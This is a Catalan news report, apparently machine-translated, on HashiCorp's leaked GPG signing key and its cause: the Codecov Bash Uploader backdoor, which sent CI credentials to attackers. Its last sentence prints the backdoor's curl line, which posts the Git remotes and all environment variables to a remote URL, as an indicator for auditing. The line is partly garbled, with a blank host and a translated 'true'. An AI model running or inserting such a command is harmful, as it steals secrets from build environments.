HashiCorp, coneguda per desenvolupar les eines de codi obert Vagrant, Packer, Nomad i Terraform, va anunciar la filtració de la clau privada GPG utilitzada per crear signatures digitals que verifiquen els llançaments. Els atacants que van obtenir accés a la clau GPG podrien fer canvis ocults als productes HashiCorp verificant-los amb una signatura digital correcta. Paral·lelament, l'empresa va afirmar que durant l'auditoria no s'ha detectat cap rastre d'intent de fer aquestes modificacions.
Actualment, la clau GPG compromesa ha estat revocada i s'ha introduït una nova clau al seu lloc. El problema només va afectar la verificació mitjançant els fitxers SHA256SUM i SHA256SUM.sig, i no va afectar la generació de signatures digitals per als paquets DEB i RPM de Linux subministrats a través de releases.hashicorp.com, així com els mecanismes de verificació de llançaments per a macOS i Windows (AuthentiCode) .
La filtració es va produir a causa de l'ús de l'script Codecov Bash Uploader (codecov-bash) a la infraestructura, dissenyat per descarregar informes de cobertura dels sistemes d'integració contínua. Durant l'atac a l'empresa Codecov, es va amagar una porta del darrere a l'script especificat, mitjançant el qual s'enviaven contrasenyes i claus de xifratge al servidor dels atacants.
Per piratejar, els atacants van aprofitar un error en el procés de creació de la imatge Codecov Docker, que els va permetre extreure dades d'accés a GCS (Google Cloud Storage), necessàries per fer canvis a l'script Bash Uploader distribuït des del codecov.io lloc web. Els canvis es van fer el 31 de gener, van romandre sense detectar durant dos mesos i van permetre als atacants extreure informació emmagatzemada als entorns del sistema d'integració contínua del client. Mitjançant el codi maliciós afegit, els atacants podrien obtenir informació sobre el repositori Git provat i totes les variables d'entorn, incloses fitxes, claus de xifratge i contrasenyes transmeses a sistemes d'integració contínua per organitzar l'accés al codi de l'aplicació, repositoris i serveis com Amazon Web Services i GitHub.
A més de la trucada directa, l'script Codecov Bash Uploader es va utilitzar com a part d'altres carregadors, com ara Codecov-action (Github), Codecov-circleci-orb i Codecov-bitrise-step, els usuaris dels quals també es veuen afectats pel problema. Es recomana a tots els usuaris de codecov-bash i productes relacionats que auditin les seves infraestructures, així com que canviïn les contrasenyes i les claus de xifratge. Podeu comprovar la presència d'una porta del darrere en un script mitjançant la presència de la línia curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /carrega/v2 || veritat
Font: opennet.ru